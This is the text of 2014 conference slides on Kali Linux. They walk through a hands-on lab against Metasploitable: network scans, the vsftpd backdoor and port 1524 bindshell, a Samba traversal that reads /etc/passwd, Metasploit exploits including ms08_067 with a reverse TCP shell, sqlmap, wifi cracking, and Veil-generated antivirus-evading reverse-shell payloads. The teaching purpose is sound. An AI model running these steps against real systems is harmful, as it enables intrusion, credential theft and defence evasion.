Kali LinuxPresentation on Kali Linux

Ohio HTCIA 2014 Spring ConferenceSalt Fork Lodge

Welcome – Salt Fork 2014

Welcome

Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nation-wide at the college level.

He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics.

Who or What is ‘Kali’?

Who is Kali?

Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively!

Anu Yadavalli

Hindu Kali

What is Kali Linux?

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.

What’s on the DVD?

/books◦Official Kali Guide◦eForensics

/media◦7-Zip, kali_iso, SD_formatter, Unetbootin,

USB_installer, VMware, Win32_DiskImager/metaspolitable/PPT

http://www.kali.org/

Legend

We’re going to type something

We’re going to make a note

Might be a question?

We’re going to click on something

Recon Attack

Ready?

Use your powers for good

Getting Ready…

- Let’s make a folder called kali_2014- Copy the DVD contents into that folder- Install 7-Zip- Install VMware Player

Let’s make sure the virtual environments are working and can ‘ping’ each other

VMware Player

Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications.

Logins / Passwords

Kali Login rootKali Password password

Metaspolitable Login msfadminMetaspolitable Password msfadmin

Metaspolitable V/E

Login msfadmin Password msfadmin

ifconfig Jot down the IP & Netmask

route Jot down the Gateway

Metaspolitable V/E

Virtual Environment #1◦Metaspolitable

Go to TERMINALrlogin –l root <IP Address>cd /tmpls -l ...vs... ls -larm .X0-lock

startx

Kali V/E

Login root Password password

ifconfig Jot down the IP & Netmask

route Jot down the Gateway

Kali V/E

Go to:

Applications System Tools Preferences System Settings Display Resolution: ____

Then…[Apply]

Kali Updating

From the command line, type

apt-get update && apt-get upgrade

Note: This has already been done to save time, but should be done after a new installation.

Are we good?

There are several categories

Top 10 Security ToolsInformation GatheringVulnerability AnalysisWeb Applications Password AttacksWireless Attacks Exploitation ToolsSniffing/Spoofing Maintaining AccessReverse EngineeringStress Testing Hardware HackingForensics Reporting ToolsSystem Services

Metapackages also exist

Command Line ToolsPresentation on Kali Linux

ping

ping

Packet InterNet GroperPort = 8

Establishes physical connectivity between two entities

(from Kali) ping <Target IP>

Did it echo back?

top

top

Tells us what services are running, processes, memory allocation

Basically, a live system monitor

df

df

Tells us how much space is available or ‘disk free’

du

du

Tells us how much space is taken or ‘disk used’.

You can get a shorter report by…

‘du –s’ … (disk used –summary)

free

free

How much ‘free’ memory is available

ls

ls

This is for ‘list’

ls –l (list –long) ls -la (list – long – all attributes)

pwd

pwd

Directory structure

Means ‘path to working directory’ or ‘print working directory’

ps / ps aux / pstree

ps

Means ‘Process Status’◦aux – auxiliary view◦pstree – shows parent/child relationships

◦Windows – tasklist / taskkill

Kill - Stops a process (ex: kill PID)

Both EnvironmentsPresentation on Kali Linux

Can you ‘ping’ each other?

Virtual Environment #1 (Metaspolitable)◦Go to TERMINAL◦ifconfig◦…jot this number down…

Virtual Environment #2 (Kali)◦Go to TERMINAL◦ifconfig◦…jot this number down…

CLI & ServicesPresentation on Kali Linux

traceroute

traceroute

Essentially, ‘tracert’ in Windows

traceroute –i eth0 <Target IP>

It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network

nmap

nmap –p0-65535 <Target IP> | less

A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network

nmap

nmap –sS –Pn –A <Target IP>

A security scanner used to discover hosts and services on a computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack.

rlogin (from Metaspolitable)

rlogin –l root <Target IP>

whoami

tcpdump -i eth0 host <Target IP>

A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

rpcinfo

rpcinfo –p <Target IP>

A utility makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.

showmount

showmount –e <Target IP>

showmount –a <Target IP>

It displays a list of all clients that have remotely mounted a file system from a specified machine in the Host parameter. This information is maintained by the [mountd] daemon on the Host parameter.

telnet

telnet <Target IP> 21After '220...'

user backdoored:)

<CTRL><]>

quit

Port 20/21 is FTP

telnet

telnet <Target IP> 6200After 'Escape character...',

id;

<CTRL><]>

quit

Port 6200 - Oracle Notification Service remote port Oracle Application Server

telnet

telnet <Target IP> 6667

IRC (Internet Relay Chat)

Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO.

telnet

telnet <Target IP> 1524After 'root@meta....',

id

Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP.

Are we good?

smbclient

smbclient –L <//Target IP>

msfconsole...wait, wait, wait..., then

use auxiliary/admin/smb/samba_symlink_traversal

set RHOST <Target IP>

set SMBSHARE tmp

smbclient

exploit

...Connecting to the server.....

...<yadda, yadda, yadda>...

...Auxiliary module....

At the prompt, type exit

smbclient

smbclient //<Target IP>/tmp

Do you get the 'smb: \>' prompt? cd rootfs cd etc more passwd

Do you get a list of all user accts?

tcpdump

On Kali…

tcpdump –I eth0 src <Target IP>

On Metaspolitable…ping www.yahoo.comopen a Browser & go to CNN.com

netdiscover

On Kali

netdiscover –i eth0 –r <Target IP>/24

Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without DHCP server, when you are wardriving. It can be also used on hub/switched networks.

nikto

On Kali

nikto –h <Target IP>

Its an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers.

sqlmap

On Kali

sqlmap –u http://<Target IP> --dbs

It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

Wasp Services

From Kali – open IceWeasel

http://<Target IP>/

Research: Multillidae <p. 8>

The Mutillidae are a family of more than 3,000 species of wasps (despite the names) whose wingless females resemble large, hairy ants. Their common name ‘velvet ant’ refers to their dense pile of hair which most often is bright scarlet or orange, but may also be black, white, silver, or gold.

Web Services

From Kali – open IceWeasel

http://<Target IP>/

Research: Multillidae <p. 8>

Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application

whatweb

From Kali

whatweb <Target IP>

whatweb –v <Target IP>

whatweb –a 4 <Target IP>

WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.

From Kali - msfconsolePresentation on Kali Linux

msfconsole

From Kali

service postgresql start

service metasploit start

msfconsole

Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsoleWe will then take a look at the built-in exploit tools

msfconsole

From [msf>] console

help search

show exploits

search dns

‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.

msfconsole

From [msf>] console

search Microsoft

search diablo

search irc

search http

Let’s try a few more to see what they do….

msfconsole

From [msf>] console, search for ‘unreal’

info <exploit>

use <exploit>

show options

LHOST, RHOST, LPORT, RPORT

msfconsole

From [msf>] console (ex: unreal)

set RHOST <IP Address>

show options

exploit

msfconsole

From [msf>] console, search for ‘twiki’

info <exploit>

use <exploit>

show options

LHOST, RHOST, LPORT, RPORT

msfconsole

From [msf>] console (ex: ‘twiki’)

set RHOST <IP Address>

show options

exploit

msfconsole

From [msf>] console, (target: Win XP)

use exploit/windows/smb/ms08_067_netapi

show options

show targets

set target 2

msfconsole

From [msf>] console, (target: Win XP)

show options

show advanced

show targets

show payloads

msfconsole

From [msf>] console, (target: Win XP)

set payload windows/shell_reverse_tcp

show options

set LHOST <Kali IP Address>

set RHOST <Target IP Address>

msfconsole

From [msf>] console, (target: Win XP)

show options

exploit

Any errors?

From Kali – more GUIPresentation on Kali Linux

Zenmap

Let’s run Zenmap

Applications Kali Linux

Information Gathering

DNS Analysis

Zenmap

SHODAN

Let’s run SHODAN

Open a browser

www.shodanhq.com

type in ‘almost anything’

…Be very nervous…

FERN

Let’s run FERN

Kali Linux

Wireless Attacks

Wireless Tools

fern-wifi-cracker

recon-ng

Kali has many built-in tools, but you can always install more (Debian-based). But, you may always wish to add more such as recon-ng.

recon-ngautomated info gathering and

network reconnaissance.

recon-ng

Let’s run recon-ng…

cd /opt/recon-ng

/usr/bin/python recon-ng

show modules

recon/hosts/gather/http/web/google_site

recon-ng

Let’s run recon-ng…

set DOMAIN <domain.com>

run (…let this run awhile…)

back (…previous level…)

show modules

recon-ng

Let’s run recon-ng…

use reporting/csv

run

Will add your new information to /usr/share/recon-ng/workspaces/default

dmitry

If you want something more basic…dmitry

dmitry –s <domain.com>

It gives you site names & IP’s

veil

Kali has many built-in tools, but you can always install even more (Debian-based). You may always wish to add more such as veil.

veilRemote shell payload generator that can bypass many anti-virus programs.

veil

Let’s run veil

veil-evasion

list (available payloads list)

use 13 (powershell/VirtualAlloc)

generate

veil

Let’s run veil

1 (msfvenom)

[ENTER] (accept default)

Value for LHOST (Target IP)

Value for LPORT (ex: 4000)

veil

Let’s run veil

Output name (“Squatch”)

It will store this new batch file to the /usr/share/veil/output/source folder. When the file is run from the target machine, it will attempt to do a reverse shell session with Kali.

Final Thoughts…

Kali InformationSee ‘Notes’ section in this slide

Kali ComparisonsSee ‘Notes’ section in this slide

Kali-specific WebsitesSee ‘Notes’ section in this slide

Kali PublicationsSee ‘Notes’ section in this slide

Questions/Concerns

But wait, that’s not all

Kali in a box?

Do you want to run Kali on tablet or phone?

http://www.kali.org/how-to/kali-linux-android-linux-deploy/

Pentesting with Firefox?

The Firefox web browser is great tool to test vulnerabilities of a website. There is a portable version on PortableApps. I would suggest this version and install the needed plugins. Then, fire up the browser and ‘use your powers for good’.

Thank You

Thank you

Thank you for your time.

Falconer TechnologiesTonyGodfrey@FalconerTechnologies.com

877 / TUX RULZ or 877 / 889-7859